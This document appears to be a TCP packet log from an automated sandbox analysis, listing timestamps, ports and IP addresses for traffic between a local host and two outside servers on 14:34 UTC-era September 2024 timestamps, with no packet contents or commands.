                                        Sep 9, 2024 17:34:40.887200117 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.887252092 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.887574911 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.887609005 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.887633085 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.887644053 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.887667894 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.887686014 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.888117075 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.888154030 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.888185024 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.888196945 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.888221979 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.888338089 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.888444901 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.888477087 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.888501883 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.888510942 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.888523102 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.888617992 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.933840036 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.933885098 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.933928967 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.933962107 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.933978081 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.933978081 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.952179909 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.952210903 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.952253103 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.952264071 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.952292919 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.952691078 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.952724934 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.952756882 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.952764034 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.952790976 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.973766088 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.973803043 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.973922014 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.973922014 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.973947048 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.974203110 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.974235058 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.974270105 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.974277020 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:40.974306107 CEST49170443192.168.2.22207.241.227.96
                                        Sep 9, 2024 17:34:40.974684000 CEST44349170207.241.227.96192.168.2.22
                                        Sep 9, 2024 17:34:42.190846920 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190856934 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190859079 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.190867901 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190877914 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.190893888 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.190916061 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191106081 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191116095 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191126108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191134930 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191145897 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191153049 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191179991 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191251993 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191318035 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191426992 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191437006 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191447020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191489935 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191660881 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191670895 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191680908 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191689968 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191700935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191724062 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191742897 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191847086 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191859007 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191869020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191878080 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.191931009 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.191956043 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192027092 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192044973 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192081928 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192128897 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192224979 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192234993 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192245007 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192255020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192265034 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192266941 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192276001 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192291975 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192310095 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192553043 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192564011 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192573071 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192583084 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192593098 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192601919 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192605972 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192612886 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192625046 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192650080 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.192713976 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192723989 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192733049 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.192754984 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193080902 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193090916 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193100929 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193109989 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193133116 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193273067 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193284035 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193293095 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193303108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193335056 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193341970 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193439007 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193450928 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193459988 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193470001 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193480015 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193484068 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193490028 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193501949 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193512917 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193516016 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193535089 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193578005 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193619013 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193747044 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193758011 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193767071 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193777084 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193788052 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.193788052 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.193809032 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.195745945 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195758104 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195766926 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195816040 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.195837975 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195849895 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195858002 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195868969 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.195878029 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.195904016 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196059942 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196070910 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196079969 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196090937 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196099997 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196104050 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196110964 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196120977 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196125984 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196134090 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196139097 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196144104 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196172953 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196180105 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196183920 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196194887 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196208954 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196218014 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196239948 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196311951 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196321964 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196331978 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196350098 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196382046 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196393013 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196433067 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196440935 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196456909 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196469069 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196480036 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196502924 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196531057 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196541071 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196549892 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196563959 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.196573019 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.196600914 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.266669989 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.266685963 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.266802073 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277379036 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277412891 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277422905 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277476072 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277559996 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277570963 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277623892 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277725935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277738094 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277748108 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277759075 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277782917 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277789116 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277792931 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.277962923 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277973890 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277985096 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.277993917 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278000116 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278003931 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278017998 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278040886 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278129101 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278139114 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278147936 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278158903 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278170109 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278181076 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278183937 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278203964 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278260946 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278307915 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278474092 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278485060 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278493881 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278503895 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278512955 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278515100 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278522968 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278533936 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278543949 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278553963 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278554916 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278574944 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278796911 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278805971 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278816938 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278825998 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278836012 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278837919 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278846979 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278860092 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278876066 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.278979063 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.278990984 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279000044 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279011011 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279021978 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279021978 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279032946 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279042959 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279043913 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279063940 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279277086 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279289007 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279325962 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279454947 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279465914 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279474974 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279484987 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279495955 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279500008 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279505968 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279515982 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279516935 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279526949 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279536009 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279539108 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279550076 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279556990 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279589891 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.279746056 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279757023 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.279794931 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283440113 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283448935 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283458948 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283468962 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283478975 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283518076 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283518076 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283601999 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283617020 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283627033 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283638000 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283647060 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283649921 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283669949 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283766985 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283776999 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283786058 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283797979 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283802032 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283807993 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283833027 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.283948898 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283960104 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283968925 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283977985 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283986092 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.283998013 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284024000 CEST4917180192.168.2.2285.239.241.184
                                        Sep 9, 2024 17:34:42.284142971 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284152985 CEST804917185.239.241.184192.168.2.22
                                        Sep 9, 2024 17:34:42.284162045 CEST804917185.239.241.184192.168.2.22
TCP Packets (continued)

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 9, 2024 17:34:42.284176111 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284185886 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284189939 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284195900 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284207106 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284216881 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284220934 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284236908 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284286022 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284302950 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284312963 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284322977 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284342051 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284362078 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284483910 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284493923 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284502983 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284512043 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284522057 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284532070 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284535885 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284543037 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284553051 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284557104 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284563065 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284573078 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284574032 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284583092 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284596920 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284617901 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284652948 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284665108 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
Sep 9, 2024 17:34:42.284707069 CEST | 49171 | 80 | 192.168.2.22 | 85.239.241.184
Sep 9, 2024 17:34:42.284822941 CEST | 80 | 49171 | 85.239.241.184 | 192.168.2.22
